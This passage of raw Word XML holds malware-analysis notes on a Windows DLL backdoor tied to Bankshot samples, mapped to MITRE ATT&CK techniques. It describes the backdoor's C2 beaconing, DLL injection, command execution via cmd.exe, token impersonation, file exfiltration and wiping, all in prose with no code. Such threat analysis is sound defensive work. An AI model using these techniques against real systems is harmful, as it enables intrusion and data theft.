        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t>. These URLs can be found hardcoded in the implants’ code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443FFB53" w14:textId="2A9363D0" w:rsidR="004B5FA9" w:rsidRDefault="009143CE" w:rsidP="00015AC1">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t xml:space="preserve">The sample (a2e966edee45b30bb6bb5c978e55833eec169098) is a Windows DLL that serves as a backdoor and contains a variety of capabilities. The malicious DLL is not a service DLL because it lacks </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009143CE">
        <w:t>ServiceMain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009143CE">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009143CE">
        <w:t>). To mask itself, it can run as a regular library loaded into a legitimate process</w:t>
      </w:r>
      <w:r w:rsidR="006F632A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006F632A">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="006F632A" w:rsidRPr="006F632A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1055.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006F632A" w:rsidRPr="006F632A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection: Dynamic-link Library Injection</w:t>
      </w:r>
      <w:r w:rsidR="0035641D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000E45D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="0035641D" w:rsidRPr="0035641D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1574.002 : &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
      <w:r w:rsidR="000E45D5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="006F632A">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidRPr="009143CE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E955F28" w14:textId="2878504B" w:rsidR="00A02881" w:rsidRDefault="00A02881" w:rsidP="00A02881">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example approach (from later attack) [4] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74887F" w14:textId="1570AB01" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:r>
        <w:t xml:space="preserve">[1] The malware begins by creating a new thread from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DllMain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) function to carry out its malicious activities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A56600" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">New thread created in the malware’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DllMain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46F421" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The malware performs the following activities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C105F92" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9"/>
    <w:p w14:paraId="0B2F25C1" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Builds imports by dynamically loading APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC81C0E" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Decrypts strings needed for control server communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E90EBD" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Performs control server communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE757B4" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Handles commands issued by the control server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C7593" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uninstalls self from the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7526F" w14:textId="26808F72" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The malicious thread dynamically loads the APIs it needs at the beginning of its execution using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(). APIs from the following libraries are loaded at runtime:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F416D88" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13CC9B" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Ws2_32/wsock32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D1F37" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Apvapi32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC350B5" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Oleaut32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBED6B" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Iphlp.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BD5D1" w14:textId="6AD00E84" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Urlmon.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6E8616" w14:textId="77777777" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9"/>
    <w:p w14:paraId="283D2B10" w14:textId="75F53BFA" w:rsidR="004B5FA9" w:rsidRPr="004B5FA9" w:rsidRDefault="00BA521F" w:rsidP="004B5FA9">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="004B5FA9" w:rsidRPr="004B5FA9">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Control Server Communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D692D4" w14:textId="182DBB29" w:rsidR="004B5FA9" w:rsidRDefault="004B5FA9" w:rsidP="004B5FA9">
      <w:r>
        <w:t>The malware initiates communication with the control server by sending it an HTTP POST request with additional optional HTTP data, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B07277" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>board_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a four-digit number that may be an identifier for a campaign ID. Based on analysis of previous samples, this is a unique identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33242BA7" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a hardcoded value in the malware binary that is sent to the control server. The username appears to be attacker specified and has occurred in 2017 Bankshot samples. This links the previous samples with this unique username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB7924" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>filename is based on static analysis. This looks like a specific beacon to indicate that the malware is ready to receive commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06531AE5" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3B7B3D" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF3A7E8" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Commands received from the control server are encoded DWORDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71CBF1" w14:textId="192C4150" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>After decoding, these DWORDs should be in the range 123459h to 123490h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D24EE3" w14:textId="0C29367B" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328D5567" w14:textId="205DC12D" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00BA521F">
      <w:r>
        <w:t>[1] Based on the responses received from the control server, the malware can carry out the following malicious tasks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7312277B" w14:textId="15E42E2E" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recursively generate a list of files in a directory and send to the control </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="00515311">
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00515311">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00515311" w:rsidRPr="00997574">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1083 : File and Directory Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00997574">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B26D0" w14:textId="62DC985A" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Terminate a specific process. The process is identified by the control server sending the PID to the malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7370A5D1" w14:textId="236C2EFC" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gather network addresses </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB794B">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00FB794B" w:rsidRPr="00FB794B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB794B" w:rsidRPr="00FB794B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1016 : System Network Configuration Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00FB794B">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00FB794B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and operating system version</w:t>
      </w:r>
      <w:r w:rsidR="00FB794B">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:r w:rsidR="00FB794B" w:rsidRPr="004C6CB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1082 : System Information Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00FB794B" w:rsidRPr="00A26835">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB794B">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A22D0FF" w14:textId="16FFBC26" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Execute arbitrary commands using “cmd.exe /c”</w:t>
      </w:r>
      <w:r w:rsidR="008442BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008442BB">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="008442BB" w:rsidRPr="008442BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008442BB" w:rsidRPr="008442BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> : &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
      <w:r w:rsidR="008442BB">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8A6EB" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Spawning arbitrary processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE86EDF" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F23142" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Write responses from the control server to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA7D774" w14:textId="77777777" w:rsidR="00A26835" w:rsidRDefault="00BA521F" w:rsidP="00EC3D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Send information for all drives</w:t>
      </w:r>
      <w:r w:rsidR="00A26835">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A26835">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00A26835" w:rsidRPr="004C6CB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A26835" w:rsidRPr="004C6CB5">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1082 : System Information Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00A26835" w:rsidRPr="00A26835">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A26835">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8C209" w14:textId="1EAF143B" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00EC3D27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Write data sent by the control server to a temporary file matching the file path pattern %temp%\DWS00*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416897E7" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change the time of a file as specified by the control server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E4445" w14:textId="564802FA" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create a process by impersonating a logged-on user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C07A96" w14:textId="1100B470" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Getting a user token using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WTSQueryUserToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B879D" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A process created as logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C4F71" w14:textId="506C38BC" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gather the process time for all processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED07020" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Getting time information for all processes running on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA3622" w14:textId="69B39A23" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gather domain and account names based on all running processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B7717" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gathering account information from running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268484CC" w14:textId="5F2A841C" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Read a specified file’s contents and send the data to the control server</w:t>
      </w:r>
      <w:r w:rsidR="004F6482">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008442BB">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="008442BB" w:rsidRPr="008442BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008442BB" w:rsidRPr="008442BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1041 : Exfiltration Over C2 Channel</w:t>
      </w:r>
      <w:r w:rsidR="008442BB">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E75EF9" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Write data sent by the control server to an existing file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0EE916" w14:textId="3C110F3C" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mark a file to be deleted on reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010E0B6" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Marking a file for deletion on reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01B70E" w14:textId="353ABF3E" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Overwrite a file with all zeros and mark it for deletion on reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD87EDD" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wiping files with zeros and marking it for deletion on reboot. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87918A" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Delete files using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>DeleteFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE5721" w14:textId="00BDEEC2" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Load an arbitrary library into its process space. This may be used to load additional downloaded components of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A616973" w14:textId="77777777" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Loading an arbitrary library into its own process space. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241BC242" w14:textId="6708F730" w:rsidR="00BA521F" w:rsidRDefault="00BA521F" w:rsidP="00AC1463">
      <w:pPr>
